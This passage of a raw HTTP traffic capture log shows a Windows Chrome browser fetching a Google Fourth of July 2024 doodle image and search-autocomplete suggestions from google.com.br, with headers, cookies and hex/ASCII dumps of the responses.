NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:05 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/webp Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 660 Date: Thu, 04 Jul 2024 17:43:05 GMT Expires: Thu, 04 Jul 2024 17:43:05 GMT Cache-Control: private, max-age=31536000 Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 17:43:05 UTC	660	IN	Data Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80 Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:05 UTC	754	OUT	GET /logos/doodles/2024/fourth-of-july-2024-6753651837110246-law.gif HTTP/1.1 Host: www.google.com.br Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:06 UTC	660	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 198019 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 04 Jul 2024 04:51:51 GMT Expires: Fri, 04 Jul 2025 04:51:51 GMT Cache-Control: public, max-age=31536000 Last-Modified: Fri, 28 Jun 2024 21:43:37 GMT Content-Type: image/gif Age: 46275 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 17:43:06 UTC	730	IN	Data Raw: 47 49 46 38 39 61 f4 01 c8 00 f7 ff 00 29 62 54 32 29 79 31 49 94 8d b1 fa f9 b6 4b 64 84 ad c7 7b b4 20 2e 8f d9 ee ff 58 9f 32 9c 99 ad 68 92 ef 6a 89 ce ad 42 52 dc 52 38 dd 95 48 44 23 6d d2 71 6e b6 5a 84 38 6a d7 99 48 66 67 ba 45 ce cc f7 b0 cf f9 51 6c cc a5 85 39 54 86 fa b1 67 8f d0 53 49 46 7a ed 4c 24 50 fe d6 4a 39 6a ae ec 6b 46 6b 73 32 ce ce d9 2c 47 ad a8 50 6f b6 52 59 fc b0 8d 48 6b b3 94 7b 31 ce 63 5a 48 53 ad 39 94 9d f9 8f 66 4c 47 93 93 6b 8d f8 af 69 e7 ef ff f5 dc d4 96 8f ca 60 21 2d fc cd b4 ea ff ff 3a 73 e6 d7 9a 36 57 86 d6 91 38 58 f6 94 4c 30 2c 57 6c 72 b3 94 42 5a ff ef 5a a6 7b 38 b8 44 33 af b5 cb 5a 86 ed 33 28 68 6e 4a 87 6f b0 6f ff f0 da c6 bc dd b5 84 42 b6 67 76 76 a9 fd ad 84 40 75 2d 4e 6c 66 88 8e a5 d1 ea aa Data Ascii: GIF89a)bT2)y1IKd{ .X2hjBRR8HD#mqnZ8jHfgEQl9TgSIFzL$PJ9jkFks2,GPoRYHk{1cZHS9fLGki`!-:s6W8XL0,WlrBZZ{8D3Z3(hnJooBgvv@u-Nlf
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 73 b5 ff f4 6b 31 22 3b 42 f4 a1 44 52 1b 68 73 bd ff c3 93 25 9e 82 7e ad 50 40 c5 a3 49 86 61 a9 73 b5 f7 9c 84 1d bd a5 31 4d 88 fe ff ff ff 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 64 61 34 61 37 65 35 65 66 2c 20 32 30 32 32 2f 31 31 2f 32 32 2d 31 33 3a 35 30 3a 30 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 Data Ascii: sk1";BDRhs%~P@Ias1M!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 5f 24 3d 70 bb a0 dd 7c 10 b3 89 c3 b4 b0 26 e2 e1 19 8d fb 4d c2 e8 0f 12 e4 16 07 07 d2 84 20 4d 1c 04 c6 21 47 1c 03 c6 e1 c0 17 0d e8 a0 43 13 0f 36 d1 04 2f bc cc e3 01 6c b2 b9 16 85 6e ef 8d e7 e1 87 10 69 22 44 67 90 5d a6 9d 73 d7 79 21 91 26 c7 b0 06 41 14 54 bc 50 c5 8c 11 d4 58 a3 1b 73 58 51 8b 1c 01 4a 73 60 8f 08 86 60 c5 2d 0d 50 50 24 05 48 96 51 06 15 4c 62 11 c5 6c ae 35 e7 c5 08 20 56 69 e5 5e 81 68 a1 5e 00 28 ba a6 c7 97 5f 0a 80 42 0e bb 0c b0 cd 2e d1 11 31 0c 5d c3 44 b1 1a 04 1e 3c 82 a0 1c 3c 06 18 87 80 08 1a 38 20 8f 02 0a 78 60 08 42 5a 11 8b 1b 5b 6c d1 c0 a1 88 26 6a e8 a1 11 da 87 61 00 3d 74 68 e5 a4 bd 69 a2 c0 31 cc 35 c7 a5 6b 2e b8 b0 42 0f 52 0c 20 ea a8 03 5c 73 cd 36 db f4 c0 e5 67 0e 09 d1 e2 9b 65 00 ff 9a 67 9f Data Ascii: _$=p\|&M M!GC6/lni"Dg]sy!&ATPXsXQJs``-PP$HQLbl5 Vi^h^(_B.1]D<<8 x`BZ[l&ja=thi15k.BR \s6geg
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 7d ec 53 53 eb 5c a8 4e 55 12 24 08 80 0b 3a 9b d9 ae 86 f5 c2 c7 e4 6c 47 21 35 90 b8 71 69 10 6a 21 2f 35 50 da 0f e9 12 f1 71 33 c5 13 d6 c6 b9 a7 79 85 00 51 b6 95 64 80 ec db 80 47 f4 89 b7 5b 50 c1 8a 43 00 0f 37 34 c1 39 5d 14 30 71 99 91 1a d6 18 a2 1a 7b 60 ea 2b 9b eb 54 83 ae b5 1c dd c4 c3 5a a1 fb 5c a9 42 58 0f 2e e8 6a 75 3f bb e5 62 66 57 ac 60 76 86 33 18 b0 88 de 09 44 1c 45 58 8d 17 3a e4 8d 61 b0 55 ff 1b 52 38 c0 e1 7c d4 c4 73 36 51 89 75 4d b1 34 56 e1 80 b7 1a 30 be 88 e2 00 af 5a 3c d3 38 cc 21 0c 00 16 b2 61 91 90 a9 d5 44 61 05 6b 2c 68 2d d9 8a cb 05 6b 03 0f 78 58 82 94 61 e9 60 e7 0e c1 97 13 e6 b2 32 bf 2a d6 2f 8b d9 19 60 60 01 0b 52 ad 6a 30 2c e2 15 1a 23 df 6a 86 01 9e 36 93 b8 1f bd 94 8d 80 98 27 5b b8 ee b8 b5 7c 92 Data Ascii: }SS\NU$:lG!5qij!/5Pq3yQdG[PC749]0q{`+TZ\BX.ju?bfW`v3DEX:aUR8\|s6QuM4V0Z<8!aDak,h-kxXa`2*/``Rj0,#j6'[\|
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 9b f0 9c 80 07 4b 6b f5 91 98 76 52 7a d7 97 d4 a8 9c 06 c5 3f 1a 40 7d 9d 67 08 3d e0 82 e3 ff a8 93 37 f9 82 8b 70 0c 3a f0 23 72 20 03 05 e1 0d 4f 90 5a 86 53 7e e8 c7 44 b5 c2 7a ba a2 35 8f 40 27 2d 65 2b 51 99 8e 43 92 89 cc 03 28 0d 00 8a 5b f9 9a 56 e1 0e 81 60 1d ce 21 80 c9 90 09 04 30 8b b7 88 0d c0 d9 96 bf 19 9c 16 79 a1 12 19 0a 04 f0 00 ac 11 05 74 b7 60 78 b0 09 de 30 a2 de 20 0e 08 b0 0b 85 04 98 28 f7 04 4f a0 81 9b 66 8d 42 a7 05 03 25 59 ae 34 78 31 1a 7c d4 30 44 7a d0 03 67 d0 a3 90 a0 6a 68 70 06 62 70 06 95 20 a4 95 90 08 67 e0 73 68 f0 a3 68 d0 a4 ad b6 08 8b 90 94 89 b8 8e fe e0 0d bb f0 66 56 45 04 58 30 4f ec 15 84 77 62 05 ee 87 28 39 75 27 b5 60 02 5e 80 05 2e 30 1d 58 40 05 65 f0 02 2f a0 04 1b 50 06 14 20 a7 14 a0 04 01 b4 Data Ascii: KkvRz?@}g=7p:#r OZS~Dz5@'-e+QC([V`!0yt`x0 (OfB%Y4x1\|0Dzgjhpbp gshhfVEX0Owb(9u'`^.0X@e/P
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 3c d6 f5 cc 05 f8 ec 23 94 b0 ac cc ca ba 6b 15 9f 54 00 0f 2d e5 27 ba b0 03 0c b9 03 7c 0d 03 3b 10 02 b7 f0 44 d2 63 c9 b7 65 d7 b7 32 9a 2a c0 32 10 14 02 9e 58 ca 1a 4d 1e 76 c1 43 63 97 1a 68 c7 1e 9b 72 3e e6 52 30 48 b0 1a 34 80 0f bc 49 a1 c4 09 cc 12 29 c4 34 9d cb 35 5d d3 39 dd a8 6d f9 d2 b4 48 05 22 94 6e 8f b5 b0 c9 77 01 08 b0 09 4b 40 bf 93 06 98 29 07 08 3e 93 c5 1a f8 72 36 5a 23 92 a6 0d 90 1b 4b 1a 20 09 d0 b8 46 6c 84 01 2b 10 00 5e 2d d6 66 2d cf ef fc ce 61 3d d6 f0 7c ce e9 6c 0b f1 10 35 24 13 07 ba ff 90 ae 19 3c 65 59 ea 03 2d 66 20 e7 c0 09 c1 10 c4 ea 1d c4 84 d0 02 95 dc 2f 98 f3 09 09 34 68 f2 a7 4e 80 a6 28 6e 40 20 57 fb d8 1e a1 18 8b a1 1c 26 d2 1c af 70 8a 98 7d 1d 3c 00 38 cc d0 22 af d0 05 3c 2c b6 db 4b 91 31 7d da Data Ascii: <#kT-'\|;Dce2*2XMvCchr>R0H4I)45]9mH"nwK@)>r6Z#K Fl+^-f-a=\|l5$<eY-f /4hN(n@ W&p}<8"<,K1}
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 4a 0b 2d 49 4b 40 63 c7 33 7c 60 69 6a 35 d7 c2 14 00 01 71 66 a3 c6 39 dc 6c eb 67 0f 43 0c 29 cc 85 15 06 91 42 12 3a 35 18 47 83 34 f3 44 73 05 43 08 ba 4e 22 51 2a 48 c0 0f 3f 9a 49 40 3c 86 14 12 ff cf 08 00 a0 81 40 c8 16 a4 b2 21 07 0d 4a 12 08 02 0a d0 f9 45 1e fc ee 8b 84 a6 9a 22 80 61 a6 fd 7e 6a c0 01 2b ac 70 43 85 4f 5a fd 84 03 0e dc 38 ca 28 39 1e 71 e0 d6 5b 39 b8 a5 a6 57 20 20 82 44 60 83 15 36 2b 77 dc b1 20 90 19 66 18 64 59 66 5d 50 f1 59 68 a3 6d ca 85 1e 92 9d 21 10 0b 2c 60 c6 9f 0b 2f d4 4a 9c 19 0a e3 25 ad 5b e3 80 67 28 b7 6e 9c b1 2f c0 d4 0d 92 af 77 39 82 87 41 bb 76 84 a0 c2 00 52 39 f2 31 c5 96 ec d7 31 c5 9e bc 8c 32 82 31 c3 ac 11 76 0e a1 25 83 43 b6 cc 00 0a c7 52 b1 32 83 31 2e 81 40 0f 30 c5 6c 0d 90 4d 3a a1 2d 4f Data Ascii: J-IK@c3\|`ij5qf9lgC)B:5G4DsCN"Q*H?I@<@!JE"a~j+pCOZ8(9q[9W D`6+w fdYf]PYhm!,`/J%[g(n/w9AvR91121v%CR21.@0lM:-O
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 5a 3d 20 02 04 7c 00 3a 21 9e 35 ac d6 14 6b 59 ed ac b9 0d 78 c0 03 2f 48 5d 9f ff 45 ce 0f 44 89 10 5b c2 07 21 32 c3 19 cf d8 35 03 6b 20 c0 1a d6 80 60 d0 2c b8 c1 ad 01 41 01 a6 6a 46 98 a5 89 c2 07 58 41 62 f5 44 d0 34 f5 43 8f 1f 0e c0 74 c2 c3 50 c9 02 72 19 40 5b 88 42 24 82 90 cc 6e f6 2e 21 70 1a 54 d8 43 12 6d 50 63 92 54 50 41 af 7d cd 63 60 fb da 26 9f f0 75 af 01 d4 93 62 27 5b d9 cb 9e 60 71 ad fc 6c b0 68 a2 57 2a 72 c1 99 a1 ab 54 e9 76 99 a9 5f b6 2e 4f 07 40 e6 9e 62 9b a7 0c 30 5d 85 3c a0 12 76 1d 51 9b ed 55 f7 7a af b9 2e f7 c2 8b 23 6a f5 c0 1f 90 34 45 7c e7 37 14 03 3b 44 c3 0e 81 0b 81 71 c6 df 4c 00 8d ff 25 2c 81 0b 78 6a e9 10 4c a0 83 2b 2a d4 9a 15 90 c1 13 85 68 e1 5f 5b a6 c6 3c 0d b6 d3 18 df 70 1a ed 38 6a d6 f4 e6 7b Data Ascii: Z= \|:!5kYx/H]ED[!25k `,AjFXAbD4CtPr@[B$n.!pTCmPcTPA}c`&ub'[`qlhWrTv_.O@b0]<vQUz.#j4E\|7;DqL%,xjL+h_[<p8j{
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 3c d2 3c 85 5e 9b 13 34 e1 06 0e 1c 45 18 8d d1 cd 3b c9 81 00 1f 97 73 1f 87 b8 0e eb c8 4d f7 b9 88 8c ba c9 1a bc 4a 08 f0 c9 9c 8b 85 22 9d 83 48 98 83 58 50 d2 e4 54 36 63 d0 33 3d 9b 07 0f 98 87 67 e0 05 2b 6d 02 1d f0 01 1f d8 0f 20 3b ba 7b f1 4e 70 00 cf e7 63 06 0e 8a 82 48 ca 05 37 71 81 ac 14 bf ff ab 33 aa 2d f4 42 b0 84 d3 70 54 85 ed da 46 3b 65 d3 01 a8 aa 5b 10 0a 39 58 05 fe fc cf ba e4 80 76 23 22 35 14 50 8e c8 86 de 00 05 18 60 92 25 79 d0 07 80 18 bd c3 b7 50 20 00 80 5c 27 02 f0 05 de 0b c4 41 fc 0c 5c b0 84 51 e8 06 6c b0 4c 3a c8 cc 8c d9 cc 11 1d 87 96 d1 06 06 90 04 ca 23 cf d0 b2 13 3b e9 30 d7 7c 4d 0c 98 80 91 1c c5 09 38 c5 82 88 49 dc 54 94 f0 80 c1 59 7c 35 00 d0 03 08 70 83 39 a0 c1 8f e8 96 61 58 55 3a b1 99 00 38 06 22 Data Ascii: <<^4E;sMJ"HXPT6c3=g+m ;{NpcH7q3-BpTF;e[9Xv#"5P`%yP \'A\QlL:#;0\|M8ITY\|5p9aXU:8"
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: a3 96 66 67 9e e6 27 1e 0f 8a d0 d1 86 a8 83 eb 05 67 65 fb 62 de 0b 61 de ab d6 af c6 ad 9e 28 be e4 5b b6 4f 18 ae 74 36 eb bb a1 db 41 88 01 73 78 67 4f 88 4d 92 68 0a 3d b0 36 32 b4 53 6f 24 e0 44 26 e0 f8 14 43 b2 dc 06 29 68 0a f9 89 10 ff 34 6c 9b 58 90 10 78 84 9f d8 8b 78 1b 0a 07 fa e4 00 48 83 8b fe e8 07 70 9d 53 9e 6c 55 0e dd 6e 20 80 bc 52 c0 75 c2 01 fd cb 2f 0f 85 80 28 90 38 8a 53 d9 89 74 8e 71 78 ed d0 cc c8 d2 8c 80 08 a0 14 e7 d8 e9 59 95 51 91 f4 d9 5d 8d 66 5e 7d 35 5f 75 b9 a5 6e 49 dd 14 ee 83 38 03 1e 58 04 e7 4e b6 49 f8 5a de 03 c2 1d a8 6e eb 1e 9b b8 2c f2 b8 7c cb a6 38 86 ee f6 ee 60 31 87 1e 18 ae ef fc 88 5b 2b 09 f4 96 eb 70 b3 72 32 1b 00 40 78 4f 45 d6 eb f7 8e 81 0b f0 6b f1 2b b3 77 e8 81 57 90 0f ff 78 59 05 fd f6 Data Ascii: fg'geba([Ot6AsxgOMh=62So$D&C)h4lXxxHpSlUn Ru/(8StqxYQ]f^}5_unI8XNIZn,\|8`1[+pr2@xOEk+wWxY

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:06 UTC	1326	OUT	GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=J9-GZvKjJq-Jxc8Pk7aqmA0.1720114985301&dpr=1&nolsbt=1 HTTP/1.1 Host: www.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:06 UTC	1230	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Date: Thu, 04 Jul 2024 17:43:06 GMT Expires: Thu, 04 Jul 2024 17:43:06 GMT Cache-Control: private, max-age=3600 Content-Type: application/json; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-l9YQRacZurGF6V2pvvY0Ww' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-04 17:43:06 UTC	160	IN	Data Raw: 31 31 31 30 0d 0a 29 5d 7d 27 0a 5b 5b 5b 22 6d 61 74 74 68 65 77 20 6a 75 64 6f 6e 22 2c 34 36 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 6c 6d 22 3a 5b 5d 2c 22 7a 66 22 3a 33 33 2c 22 7a 68 22 3a 22 4d 61 74 74 68 65 77 20 4a 75 64 6f 6e 22 2c 22 7a 69 22 3a 22 41 6d 65 72 69 63 61 6e 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 65 72 22 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 70 22 3a 22 65 4a 7a 6a 34 74 56 50 31 7a 63 30 54 4d Data Ascii: 1110)]}'[[["matthew judon",46,[3,357,362,396,143],{"lm":[],"zf":33,"zh":"Matthew Judon","zi":"American football player","zl":8,"zp":{"gs_ssp":"eJzj4tVP1zc0TM
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 36 4c 74 7a 41 30 4c 73 6b 77 59 50 54 69 7a 55 30 73 4b 63 6c 49 4c 56 66 49 4b 6b 33 4a 7a 77 4d 41 69 62 34 4a 71 51 22 7d 2c 22 7a 73 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 2f 32 77 43 45 41 41 6b 47 42 77 67 48 42 67 6b 49 42 77 67 4b 43 67 6b 4c 44 52 59 50 44 51 77 4d 44 52 73 55 46 52 41 57 49 42 30 69 49 69 41 64 48 78 38 6b 4b 44 51 73 4a 43 59 78 4a 78 38 66 4c 54 30 74 4d 54 55 33 4f 6a 6f 36 49 79 73 2f 52 44 38 34 51 7a 51 35 4f 6a 63 42 43 67 6f 4b 44 51 77 4e 47 67 38 50 47 6a 63 6c 48 79 55 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 Data Ascii: 6LtzA0LskwYPTizU0sKclILVfIKk3JzwMAib4JqQ"},"zs":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 37 31 69 32 71 79 58 65 6d 78 4a 5a 74 4f 6b 6d 55 42 2b 41 35 35 54 33 42 39 4e 2f 62 42 36 45 47 75 75 4c 47 6a 4a 44 53 79 74 31 69 30 35 32 4a 42 59 6a 77 31 4d 6a 64 46 2b 57 54 35 30 46 49 45 56 38 4f 30 65 66 35 54 6b 30 44 70 79 50 71 4d 59 56 47 63 79 4e 30 52 45 2b 4c 38 2f 4b 6d 6b 76 44 73 69 78 4c 63 58 4d 66 67 71 52 67 63 38 6d 43 78 2b 51 47 35 2f 4b 70 75 47 32 7a 52 48 70 6c 49 43 75 4a 59 45 51 68 48 42 61 68 74 43 75 34 7a 71 6b 59 6b 6d 43 49 38 36 4c 36 6b 34 41 2f 57 67 62 36 33 57 4b 34 66 66 6c 47 50 73 6b 30 4e 47 67 6d 59 6f 72 4f 46 4a 51 37 64 63 6a 4f 44 36 37 6e 38 36 64 52 56 45 5a 7a 62 5a 73 71 38 4e 61 67 59 2f 45 57 7a 6d 4b 2b 59 42 50 37 31 48 2f 77 44 41 76 77 66 39 48 63 66 39 62 55 7a 2b 6a 37 6a 75 34 6d 30 53 49 Data Ascii: 71i2qyXemxJZtOkmUB+A55T3B9N/bB6EGuuLGjJDSyt1i052JBYjw1MjdF+WT50FIEV8O0ef5Tk0DpyPqMYVGcyN0RE+L8/KmkvDsixLcXMfgqRgc8mCx+QG5/KpuG2zRHplICuJYEQhHBahtCu4zqkYkmCI86L6k4A/Wgb63WK4fflGPsk0NGgmYorOFJQ7dcjOD67n86dRVEZzbZsq8NagY/EWzmK+YBP71H/wDAvwf9Hcf9bUz+j7ju4m0SI
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 76 55 65 6e 46 53 4f 6e 2f 39 6b 5c 75 30 30 33 64 22 7d 5d 2c 5b 22 66 72 65 6e 63 68 20 65 78 63 61 6c 69 62 75 72 20 73 77 6f 72 64 20 76 61 6e 69 73 68 65 73 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 6e 66 6c 20 73 75 6e 64 61 79 20 74 69 63 6b 65 74 20 6c 61 77 73 75 69 74 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 6b 65 6e 64 72 69 63 6b 20 6c 61 6d 61 72 20 6d 75 73 69 63 20 76 69 64 65 6f 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c Data Ascii: vUenFSOn/9k\u003d"}],["french excalibur sword vanishes",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["nfl sunday ticket lawsuit",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["kendrick lamar music video",0,[3,357,362,396,143],
2024-07-04 17:43:06 UTC	46	IN	Data Raw: 48 69 5a 61 53 63 4f 7a 47 63 52 32 6d 4b 6b 41 37 4d 76 63 34 6c 46 46 42 55 32 65 7a 65 4a 39 37 62 42 53 4c 68 45 32 50 4b 7a 36 0d 0a Data Ascii: HiZaScOzGcR2mKkA7Mvc4lFFBU2ezeJ97bBSLhE2PKz6
